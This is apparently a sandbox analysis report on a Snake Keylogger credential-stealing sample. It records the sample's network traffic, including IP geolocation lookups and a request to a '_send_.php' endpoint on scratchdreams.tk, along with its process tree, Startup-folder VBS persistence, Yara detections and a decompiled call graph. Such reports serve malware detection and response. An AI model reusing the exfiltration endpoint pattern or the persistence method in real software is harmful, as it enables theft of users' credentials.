                                                        2024-04-08 11:59:31 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.449765172.67.177.1344433844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:31 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        2024-04-08 11:59:32 UTC700INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:32 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79473
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZgMG1ZfHjTlclqCa9lTYTUuSepLQOz9V6q2evNO56wBa8n2FwXMNgeZBYRpxLqKzfTCtTdri0l2W5B4psLwbvmrZ9puWwj4ankqMNbfVZCLoDKBvrrkpHRX7gZOtW7rAufneqme"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8712178159ee21df-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:32 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.449767172.67.177.1344433844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:34 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        2024-04-08 11:59:34 UTC712INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:34 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 79475
                                                        Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aSVmLzNS30BwXq%2FX1zpyBiPR1cluInP4D8qPPegpDnd0eS55rx89iG5RF6X5AxwrQgbmpYsQQdo%2BYnoj4feTv1H%2FT3mhgYjevbeavhacfhcJ%2FiZm2pc3LgJ0ThnRs9D%2ByTalqtv%2F"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 871217915bbd370b-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 11:59:34 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                        Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                        2024-04-08 11:59:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.449768104.21.27.854433844C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-08 11:59:34 UTC79OUTGET /_send_.php?TS HTTP/1.1
                                                        Host: scratchdreams.tk
                                                        Connection: Keep-Alive
                                                        2024-04-08 12:00:06 UTC741INHTTP/1.1 522
                                                        Date: Mon, 08 Apr 2024 12:00:05 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 15
                                                        Connection: close
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dj2p%2BAfDACpJoanL2JZmZc9bnzw3e8yteSg10c3wPQRnApIPW54wTR87HTk9jBe%2BOM6y%2FfiH5eK%2F86yrbcAtPYlQUSZUtHN%2FpfQDfThOT8mDa0fbgmCe%2BC4gxmC0x2vL0bdb"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        X-Frame-Options: SAMEORIGIN
                                                        Referrer-Policy: same-origin
                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                        Server: cloudflare
                                                        CF-RAY: 87121794ed6e31f5-MIA
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-08 12:00:06 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                        Data Ascii: error code: 522


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:13:56:53
                                                        Start date:08/04/2024
                                                        Path:C:\Users\user\Desktop\PsBygexGwH.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\PsBygexGwH.exe"
                                                        Imagebase:0x120000
                                                        File size:1'130'496 bytes
                                                        MD5 hash:222D05295014F8974D6E358E1507770E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:13:59:08
                                                        Start date:08/04/2024
                                                        Path:C:\Users\user\AppData\Local\directory\name.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\PsBygexGwH.exe"
                                                        Imagebase:0x2c0000
                                                        File size:114'376'704 bytes
                                                        MD5 hash:90D7DF3194AF25C7942DCDB56E8902F3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:13:59:11
                                                        Start date:08/04/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\PsBygexGwH.exe"
                                                        Imagebase:0x190000
                                                        File size:45'984 bytes
                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:8
                                                        Start time:13:59:21
                                                        Start date:08/04/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                                                        Imagebase:0x7ff7649f0000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:13:59:22
                                                        Start date:08/04/2024
                                                        Path:C:\Users\user\AppData\Local\directory\name.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                        Imagebase:0x2c0000
                                                        File size:114'376'704 bytes
                                                        MD5 hash:90D7DF3194AF25C7942DCDB56E8902F3
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:13:59:24
                                                        Start date:08/04/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                        Imagebase:0x4e0000
                                                        File size:45'984 bytes
                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:2.9%
                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                          Signature Coverage:3%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:42
                                                          execution_graph 96772 121033 96777 124c91 96772->96777 96776 121042 96785 12a961 96777->96785 96781 124d9c 96783 121038 96781->96783 96793 1251f7 22 API calls __fread_nolock 96781->96793 96784 1400a3 29 API calls __onexit 96783->96784 96784->96776 96794 13fe0b 96785->96794 96787 12a976 96804 13fddb 96787->96804 96789 124cff 96790 123af0 96789->96790 96829 123b1c 96790->96829 96793->96781 96798 13fddb 96794->96798 96796 13fdfa 96796->96787 96798->96796 96801 13fdfc 96798->96801 96814 14ea0c 96798->96814 96821 144ead 7 API calls 2 library calls 96798->96821 96799 14066d 96823 1432a4 RaiseException 96799->96823 96801->96799 96822 1432a4 RaiseException 96801->96822 96802 14068a 96802->96787 96806 13fde0 96804->96806 96805 14ea0c ___std_exception_copy 21 API calls 96805->96806 96806->96805 96807 13fdfa 96806->96807 96809 13fdfc 96806->96809 96826 144ead 7 API calls 2 library calls 96806->96826 96807->96789 96810 14066d 96809->96810 96827 1432a4 RaiseException 96809->96827 96828 1432a4 RaiseException 96810->96828 96812 14068a 96812->96789 96819 153820 __dosmaperr 96814->96819 96815 15385e 96825 14f2d9 20 API calls __dosmaperr 96815->96825 96817 153849 RtlAllocateHeap 96818 15385c 96817->96818 96817->96819 96818->96798 96819->96815 96819->96817 96824 144ead 7 API calls 2 library calls 96819->96824 96821->96798 96822->96799 96823->96802 96824->96819 96825->96818 96826->96806 96827->96810 96828->96812 96830 123b0f 96829->96830 96831 123b29 96829->96831 96830->96781 96831->96830 96832 123b30 RegOpenKeyExW 96831->96832 96832->96830 96833 123b4a RegQueryValueExW 96832->96833 96834 123b80 RegCloseKey 96833->96834 96835 123b6b 96833->96835 96834->96830 96835->96834 96836 123156 96839 123170 96836->96839 96840 123187 96839->96840 96841 1231eb 96840->96841 96842 12318c 96840->96842 96880 1231e9 96840->96880 96846 1231f1 96841->96846 96847 162dfb 96841->96847 96843 123265 PostQuitMessage 96842->96843 96844 123199 96842->96844 96853 12316a 96843->96853 96851 1231a4 96844->96851 96852 162e7c 96844->96852 96845 1231d0 DefWindowProcW 96845->96853 96848 1231f8 96846->96848 96849 12321d SetTimer RegisterWindowMessageW 96846->96849 96888 1218e2 10 API calls 96847->96888 96854 123201 KillTimer 96848->96854 96855 162d9c 96848->96855 96849->96853 96857 123246 CreatePopupMenu 96849->96857 96858 1231ae 96851->96858 96859 162e68 96851->96859 96903 18bf30 34 API calls ___scrt_fastfail 96852->96903 96884 1230f2 Shell_NotifyIconW ___scrt_fastfail 96854->96884 96867 162dd7 MoveWindow 96855->96867 96868 162da1 96855->96868 96856 162e1c 96889 13e499 42 API calls 96856->96889 96857->96853 96864 162e4d 96858->96864 96865 1231b9 96858->96865 96902 18c161 27 API calls ___scrt_fastfail 96859->96902 96864->96845 96901 180ad7 22 API calls 96864->96901 96871 1231c4 96865->96871 96872 123253 96865->96872 96866 162e8e 96866->96845 96866->96853 96867->96853 96873 162dc6 SetFocus 96868->96873 96874 162da7 96868->96874 96869 123214 96885 123c50 DeleteObject DestroyWindow 96869->96885 96870 123263 96870->96853 96871->96845 96890 1230f2 Shell_NotifyIconW ___scrt_fastfail 96871->96890 96886 12326f 44 API calls ___scrt_fastfail 96872->96886 96873->96853 96874->96871 96878 162db0 96874->96878 96887 1218e2 10 API calls 96878->96887 96880->96845 96882 162e41 96891 123837 96882->96891 96884->96869 96885->96853 96886->96870 96887->96853 96888->96856 96889->96871 96890->96882 96892 123862 ___scrt_fastfail 96891->96892 96904 124212 96892->96904 96895 1238e8 96897 163386 Shell_NotifyIconW 96895->96897 96898 123906 Shell_NotifyIconW 96895->96898 96908 123923 96898->96908 96900 12391c 96900->96880 96901->96880 96902->96870 96903->96866 96905 1635a4 96904->96905 96906 1238b7 96904->96906 96905->96906 96907 1635ad DestroyIcon 96905->96907 96906->96895 96930 18c874 42 API calls _strftime 96906->96930 96907->96906 96909 123a13 96908->96909 96910 12393f 96908->96910 96909->96900 96931 126270 96910->96931 96913 163393 LoadStringW 96917 1633ad 96913->96917 96914 12395a 96936 126b57 96914->96936 96916 12396f 96918 12397c 96916->96918 96919 1633c9 96916->96919 96924 123994 ___scrt_fastfail 96917->96924 96957 12a8c7 96917->96957 96918->96917 96921 123986 96918->96921 96922 126350 22 API calls 96919->96922 96948 126350 96921->96948 96925 1633d7 96922->96925 96927 1239f9 Shell_NotifyIconW 96924->96927 96925->96924 96961 1233c6 96925->96961 96927->96909 96928 1633f9 96929 1233c6 22 API calls 96928->96929 96929->96924 96930->96895 96932 13fe0b 22 API calls 96931->96932 96933 126295 96932->96933 96934 13fddb 22 API calls 96933->96934 96935 12394d 96934->96935 96935->96913 96935->96914 96937 126b67 _wcslen 96936->96937 96938 164ba1 96936->96938 96941 126ba2 96937->96941 96942 126b7d 96937->96942 96971 1293b2 96938->96971 96940 164baa 96940->96940 96944 13fddb 22 API calls 96941->96944 96970 126f34 22 API calls 96942->96970 96945 126bae 96944->96945 96947 13fe0b 22 API calls 96945->96947 96946 126b85 __fread_nolock 96946->96916 96947->96946 96949 126362 96948->96949 96950 164a51 96948->96950 96981 126373 96949->96981 96991 124a88 22 API calls __fread_nolock 96950->96991 96953 12636e 96953->96924 96954 164a5b 96955 164a67 96954->96955 96956 12a8c7 22 API calls 96954->96956 96956->96955 96958 12a8db 96957->96958 96960 12a8ea __fread_nolock 96957->96960 96959 13fe0b 22 API calls 96958->96959 96958->96960 96959->96960 96960->96924 96962 1630bb 96961->96962 96963 1233dd 96961->96963 96965 13fddb 22 API calls 96962->96965 96997 1233ee 96963->96997 96967 1630c5 _wcslen 96965->96967 96966 1233e8 96966->96928 96968 13fe0b 22 API calls 96967->96968 96969 1630fe __fread_nolock 96968->96969 96970->96946 96972 1293c0 96971->96972 96973 1293c9 __fread_nolock 96971->96973 96972->96973 96975 12aec9 96972->96975 96973->96940 96973->96973 96976 12aedc 96975->96976 96980 12aed9 __fread_nolock 96975->96980 96977 13fddb 22 API calls 96976->96977 96978 12aee7 96977->96978 96979 13fe0b 22 API calls 96978->96979 96979->96980 96980->96973 96982 126382 96981->96982 96988 1263b6 __fread_nolock 96981->96988 96983 164a82 96982->96983 96984 1263a9 96982->96984 96982->96988 96986 13fddb 22 API calls 96983->96986 96992 12a587 96984->96992 96987 164a91 96986->96987 96989 13fe0b 22 API calls 96987->96989 96988->96953 96990 164ac5 __fread_nolock 96989->96990 96991->96954 96993 12a59d 96992->96993 96996 12a598 __fread_nolock 96992->96996 96994 16f80f 96993->96994 96995 13fe0b 22 API calls 96993->96995 96995->96996 96996->96988 96998 1233fe _wcslen 96997->96998 96999 123411 96998->96999 97000 16311d 96998->97000 97002 12a587 22 API calls 96999->97002 97001 13fddb 22 API calls 97000->97001 97003 163127 97001->97003 97004 12341e __fread_nolock 97002->97004 97005 13fe0b 22 API calls 97003->97005 97004->96966 97006 163157 __fread_nolock 97005->97006 97007 122e37 97008 12a961 22 API calls 97007->97008 97009 122e4d 97008->97009 97086 124ae3 97009->97086 97011 122e6b 97100 123a5a 97011->97100 97013 122e7f 97107 129cb3 97013->97107 97018 162cb0 97151 192cf9 97018->97151 97019 122ead 97023 12a8c7 22 API calls 97019->97023 97021 162cc3 97022 162ccf 97021->97022 97177 124f39 97021->97177 97028 124f39 68 API calls 97022->97028 97025 122ec3 97023->97025 97135 126f88 22 API calls 97025->97135 97027 122ecf 97029 129cb3 22 API calls 97027->97029 97030 162ce5 97028->97030 97031 122edc 97029->97031 97183 123084 22 API calls 97030->97183 97136 12a81b 41 API calls 97031->97136 97034 122eec 97036 129cb3 22 API calls 97034->97036 97035 162d02 97184 123084 22 API calls 97035->97184 97038 122f12 97036->97038 97137 12a81b 41 API calls 97038->97137 97039 162d1e 97041 123a5a 24 API calls 97039->97041 97043 162d44 97041->97043 97042 122f21 97045 12a961 22 API calls 97042->97045 97185 123084 22 API calls 97043->97185 97047 122f3f 97045->97047 97046 162d50 97048 12a8c7 22 API calls 97046->97048 97138 123084 22 API calls 97047->97138 97050 162d5e 97048->97050 97186 123084 22 API calls 97050->97186 97051 122f4b 97139 144a28 40 API calls 3 library calls 97051->97139 97054 162d6d 97057 12a8c7 22 API calls 97054->97057 97055 122f59 97055->97030 97056 122f63 97055->97056 97140 144a28 40 API calls 3 library calls 97056->97140 97059 162d83 97057->97059 97187 123084 22 API calls 97059->97187 97060 122f6e 97060->97035 97062 122f78 97060->97062 97141 144a28 40 API calls 3 library calls 97062->97141 97063 162d90 97065 122f83 97065->97039 97066 122f8d 97065->97066 97142 144a28 40 API calls 3 library calls 97066->97142 97068 122f98 97069 122fdc 97068->97069 97143 123084 22 API calls 97068->97143 97069->97054 97070 122fe8 97069->97070 97070->97063 97145 1263eb 22 API calls 97070->97145 97072 122fbf 97074 12a8c7 22 API calls 97072->97074 97076 122fcd 97074->97076 97075 122ff8 97146 126a50 22 API calls 97075->97146 97144 123084 22 API calls 97076->97144 97079 123006 97147 1270b0 23 API calls 97079->97147 97083 123021 97084 123065 97083->97084 97148 126f88 22 API calls 97083->97148 97149 1270b0 23 API calls 97083->97149 97150 123084 22 API calls 97083->97150 97087 124af0 __wsopen_s 97086->97087 97088 126b57 22 API calls 97087->97088 97089 124b22 97087->97089 97088->97089 97098 124b58 97089->97098 97188 124c6d 97089->97188 97091 129cb3 22 API calls 97093 124c52 97091->97093 97092 129cb3 22 API calls 97092->97098 97094 12515f 22 API calls 97093->97094 97096 124c5e 97094->97096 97096->97011 97097 124c29 97097->97091 97097->97096 97098->97092 97098->97097 97099 124c6d 22 API calls 97098->97099 97191 12515f 97098->97191 97099->97098 97197 161f50 97100->97197 97103 129cb3 22 API calls 97104 123a8d 97103->97104 97199 123aa2 97104->97199 97106 123a97 97106->97013 97108 129cc2 _wcslen 97107->97108 97109 13fe0b 22 API calls 97108->97109 97110 129cea __fread_nolock 97109->97110 97111 13fddb 22 API calls 97110->97111 97112 122e8c 97111->97112 97113 124ecb 97112->97113 97219 124e90 LoadLibraryA 97113->97219 97118 124ef6 LoadLibraryExW 97227 124e59 LoadLibraryA 97118->97227 97119 163ccf 97121 124f39 68 API calls 97119->97121 97123 163cd6 97121->97123 97125 124e59 3 API calls 97123->97125 97127 163cde 97125->97127 97126 124f20 97126->97127 97128 124f2c 97126->97128 97249 1250f5 97127->97249 97129 124f39 68 API calls 97128->97129 97132 122ea5 97129->97132 97132->97018 97132->97019 97134 163d05 97135->97027 97136->97034 97137->97042 97138->97051 97139->97055 97140->97060 97141->97065 97142->97068 97143->97072 97144->97069 97145->97075 97146->97079 97147->97083 97148->97083 97149->97083 97150->97083 97152 192d15 97151->97152 97153 12511f 64 API calls 97152->97153 97154 192d29 97153->97154 97520 192e66 97154->97520 97157 192d3f 97157->97021 97158 1250f5 40 API calls 97159 192d56 97158->97159 97160 1250f5 40 API calls 97159->97160 97161 192d66 97160->97161 97162 1250f5 40 API calls 97161->97162 97163 192d81 97162->97163 97164 1250f5 40 API calls 97163->97164 97165 192d9c 97164->97165 97166 12511f 64 API calls 97165->97166 97167 192db3 97166->97167 97168 14ea0c ___std_exception_copy 21 API calls 97167->97168 97169 192dba 97168->97169 97170 14ea0c ___std_exception_copy 21 API calls 97169->97170 97171 192dc4 97170->97171 97172 1250f5 40 API calls 97171->97172 97173 192dd8 97172->97173 97174 1928fe 27 API calls 97173->97174 97175 192dee 97174->97175 97175->97157 97526 1922ce 97175->97526 97178 124f43 97177->97178 97179 124f4a 97177->97179 97180 14e678 67 API calls 97178->97180 97181 124f6a FreeLibrary 97179->97181 97182 124f59 97179->97182 97180->97179 97181->97182 97182->97022 97183->97035 97184->97039 97185->97046 97186->97054 97187->97063 97189 12aec9 22 API calls 97188->97189 97190 124c78 97189->97190 97190->97089 97192 12516e 97191->97192 97196 12518f __fread_nolock 97191->97196 97194 13fe0b 22 API calls 97192->97194 97193 13fddb 22 API calls 97195 1251a2 97193->97195 97194->97196 97195->97098 97196->97193 97198 123a67 GetModuleFileNameW 97197->97198 97198->97103 97200 161f50 __wsopen_s 97199->97200 97201 123aaf GetFullPathNameW 97200->97201 97202 123ae9 97201->97202 97203 123ace 97201->97203 97213 12a6c3 97202->97213 97204 126b57 22 API calls 97203->97204 97206 123ada 97204->97206 97209 1237a0 97206->97209 97210 1237ae 97209->97210 97211 1293b2 22 API calls 97210->97211 97212 1237c2 97211->97212 97212->97106 97214 12a6dd 97213->97214 97218 12a6d0 97213->97218 97215 13fddb 22 API calls 97214->97215 97216 12a6e7 97215->97216 97217 13fe0b 22 API calls 97216->97217 97217->97218 97218->97206 97220 124ec6 97219->97220 97221 124ea8 GetProcAddress 97219->97221 97224 14e5eb 97220->97224 97222 124eb8 97221->97222 97222->97220 97223 124ebf FreeLibrary 97222->97223 97223->97220 97257 14e52a 97224->97257 97226 124eea 97226->97118 97226->97119 97228 124e6e GetProcAddress 97227->97228 97229 124e8d 97227->97229 97230 124e7e 97228->97230 97232 124f80 97229->97232 97230->97229 97231 124e86 FreeLibrary 97230->97231 97231->97229 97233 13fe0b 22 API calls 97232->97233 97234 124f95 97233->97234 97325 